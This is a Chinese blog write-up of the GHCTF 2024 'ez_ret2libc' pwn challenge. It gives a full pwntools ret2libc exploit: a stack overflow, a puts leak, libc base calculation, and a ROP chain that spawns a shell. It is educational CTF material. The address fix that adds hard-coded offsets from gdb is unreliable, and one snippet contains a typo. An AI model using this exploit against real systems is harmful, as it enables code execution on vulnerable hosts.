[GHCTF 2024 新生赛]ez_ret2libc wp

已于 2024-04-11 19:32:03 修改
阅读量868 收藏 18
点赞数 12
文章标签: 网络攻击模型
于 2024-04-11 15:30:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XJQ100717/article/details/137640676
版权

目录

思路:

exp

结果

思路:

64位,开启了nx保护

有read函数,read函数是一个危险函数,可以进行栈溢出,偏移量是0x10,里面有puts函数,我们可以通过泄露puts的真实地址计算基地址,虽说每次真实地址在变但是最后三位始终是相同的。

基地址=真实地址-偏移地址

这次给你一个libc.so.6文件,这个和以往的不同,我说说他们的区别:

没有libc.so.6
from LibcSearcher import*
libc=LibcSearcher('func',func_addr) #func为你要泄露的函数
libc_base=func_addr-libc.dump('func')
system=libc_base+libc.dump('system')
binsh=libc_base+libc.dump('str_bin_sh')
有libc.so.6
libc=ELF('./libc.so.6')
libc_base=func_addr-libc.sym['func']
system=libc_base+libc.sym['system']
binsh=libc_dase+libc.search(b'/bin/sh').__next__()

64位肯定要用寄存器传参了

查一下寄存器rdi的地址

root@TOM:/mnt/c/users/32566/desktop# ROPgadget --binary ret2libc --only 'pop|ret' | grep 'rdi'
0x00000000004012b3 : pop rdi ; ret

咱们开始泄露

from pwn import*
context(os='linux',arch='amd64',log_level='debug')
p=process('./ret2libc')
elf=ELF('./ret2libc')
libc=ELF('./libc.so.6')
rdi=0x00000000004012b3
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
offest=0x10
dofunc=elf.sym['dofunc']
payload=cyclic(offest)+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(dofunc)
p.sendline(payload)
p.interactive()

看见那个\x7f没,那东西就是咱们要找的,咱们要想这接收它

from pwn import*
context(os='linux',arch='amd64',log_level='debug')
p=process('./ret2libc')
elf=ELF('./ret2libc')
libc=ELF('./libc.so.6')
rdi=0x00000000004012b3
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
offest=0x10
dofunc=elf.sym['dofunc']
payload=cyclic(offest)+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(dofunc)
p.sendline(payload)
puts=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(f"puts",hex(puts))
p.interactive()

puts的地址出来了,接下来就是计算基地址了

libc_base=puts-libc.sym['puts']
system=libc_base+libc.sym['system']
binsh=libc_base+libc.search(b'/bin/sh').__next__()

计算完后就是写payload了

payload=cyclic(offest)+p64(rdi)+p64(binsh)+p64(ret)+p64(system)

然后发送就可以,详细的看exp

exp    一切以exp为主。 

from pwn import*
context(os='linux',arch='amd64',log_level='debug')
content=0
if content==1:
    p=remote("",)
else:
    p=process('./ret2libc')
elf=ELF('./ret2libc')
libc=ELF('./libc.so.6')
rdi=0x00000000004012b3
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
ret=0x000000000040101a
offest=0x10
dofunc=elf.sym['dofunc']
payload=cyclic(offest)+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(dofunc)
p.sendline(payload)
puts=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(f"puts",hex(puts))
libc_base=puts-libc.sym['puts']
system=libc_base+libc.sym['system']
binsh=libc_base+libc.search(b'/bin/sh').__next__()
payload=cyclic(offest)+p64(rdi)+p64(binsh)+p64(ret)+p64(system)
p.sendline(payload)
p.interactive()

结果

本来前面我打通了

后面又打了一下发现打不通

print(f"system",hex(system))
print(f"binsh",hex(binsh))

然后我就打印了一下system、/bin/sh的地址,接着gdb调试发现泄露出来的system和/bin/sh与真正的system和/bin/sh差了一些距离,这个可能和libc版本有关系吧!运行一下下面的代码!

from pwn import*
context(os='linux',arch='amd64',log_level='debug')
p=process('./ret2libc')
elf=ELF('./ret2libc')
libc=ELF('./libc.so.6')
rdi=0x00000000004012b3
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
ret=0x000000000040101a
offest=0x10
dofunc=elf.sym['dofunc']
payload=cyclic(offest)+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(dofunc)
p.sendline(payload)
puts=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(f"puts",hex(puts))
libc_base=puts-libc.sym['puts']
system=libc_base+libc.sym['system']
print(f"system",hex(system))
binsh=libc_base+libc.search(b'/bin/sh').__next__()
print(f"binsh",hex(binsh))
gdb.attach(p)
payload1=cyclic(offest)+p64(rdi)+p64(binsh)+p64(ret)+p64(system)
p.sendline(payload1)
p.interactive()

我们可以看到地址对不上,为了让地址对上你可以用gdb里面查到的减去你泄露的

真实的libc1=system_real(gdb查到的)-system(泄露的)=0x20b0

真实的libc2=binsh(gdb查到的)-binsh(泄露的)=0x2768b

from pwn import*
context(os='linux',arch='amd64',log_level='debug')
p=process('./ret2libc')
elf=ELF('./ret2libc')
libc=ELF('./libc.so.6')
rdi=0x00000000004012b3
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
ret=0x000000000040101a
offest=0x10
dofunc=elf.sym['dofunc']
payload=cyclic(offest)+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(dofunc)
p.sendline(payload)
puts=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(f"puts",hex(puts))
libc_base=puts-libc.sym['puts']
system=libc_base+libc.sym['system']+0x20b0
print(f"system",hex(system))
binsh=libc_base+libc.search(b'/bin/sh').__next__()+0x2768b
print(f"binsh",hex(binsh))
gdb.attach(p)
payload1=cyclic(offest)+p64(rdi)+p64(binsh)+p64(ret)+p64(system)
p.sendline(payload1)
p.interactive()

发现地址对上了,nice,嘿嘿嘿

阿河( ˃̶̤́ ꒳ ˂̶̤̀ )
关注
  • 12
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
NEWSCTF第一届--官方wp(2021新春
qq_55400494的博客
06-02 4310
题目源码及部分wp汇总如下 链接:https://pan.baidu.com/s/1RIatd5BdmHgckwZ4w_Gcog 提取码:news Web
NKCTF2024 wp
ZJPC007的博客
03-25 1742
题目可分为两个部分:首先,需要解出四个未知数 p, q, r, s。这一部分的关键在于通过数学公式推导,根据等式 x = k1q + r^p 和 y = k2q + r^p,可以发现 x 和 y 相减后剩余的部分是 q 的整数倍,利用最大公约数(gcd)算法可以求解出 q,然后根据已知信息逐步还原出其他三个未知数。
【多线程栈溢出】极客大挑战2023 ez_fullprotection
qq_61670993的博客
11-22 409
题目不错, 学的了很多
2024Dozercrtf WP
akxnxbshai的博客
05-02 59
2024Dozerctf WP
NKCTF2023 pwn wp
S4n_v1的博客
03-31 772
NKCTF2023 pwn....
NKCTF_WP
m0_73954357的博客
03-27 627
aa
DozerCTF2024 WP(不包括域渗透)
t235336456的博客
04-30 328
队伍名:关注塔菲谢谢喵 比总结:拿下一道mid_pwn的一血,还有一道pwn的三血。感谢队伍的密码✌带我上分,最终排名12(有点菜) Web方向 队里没有web手,所以爆0
首届“鹤城杯”河南·鹤壁CTF网络安全挑战部分WP
七堇年的博客
12-24 2475
首届“鹤城杯”河南·鹤壁CTF网络安全挑战WP
2022西湖论剑-初CTF部分wp-Zodiac
toto的博客
02-03 3100
2023西湖论剑初CTF部分wp
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
Performing a ret2libc Attack-InVoLuNTaRy
04-24
ret2libc
ret2libc2pwn 入门题
02-11
pwn 入门题
16ret2libc1_32 pwn 入门题
02-11
pwn 入门题
ret2libc exploit
07-07
exploit hack linux ret2libc
2023护网蓝初面试题汇总
m0_74131821的博客
05-18 1698
日薪1000+的护网行动开始招人了,有想法的速看!
android手机应用源码Imsdroid语音视频通话源码.rar
最新发布
05-20
android手机应用源码Imsdroid语音视频通话源码.rar
营销计划汇报PPT,市场品牌 推广渠道 产品 营销策略tbb.pptx
05-20
营销计划汇报PPT,市场品牌 推广渠道 产品 营销策略tbb.pptx
JavaScript_超过100种语言的纯Javascript OCR.zip
05-20
JavaScript
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值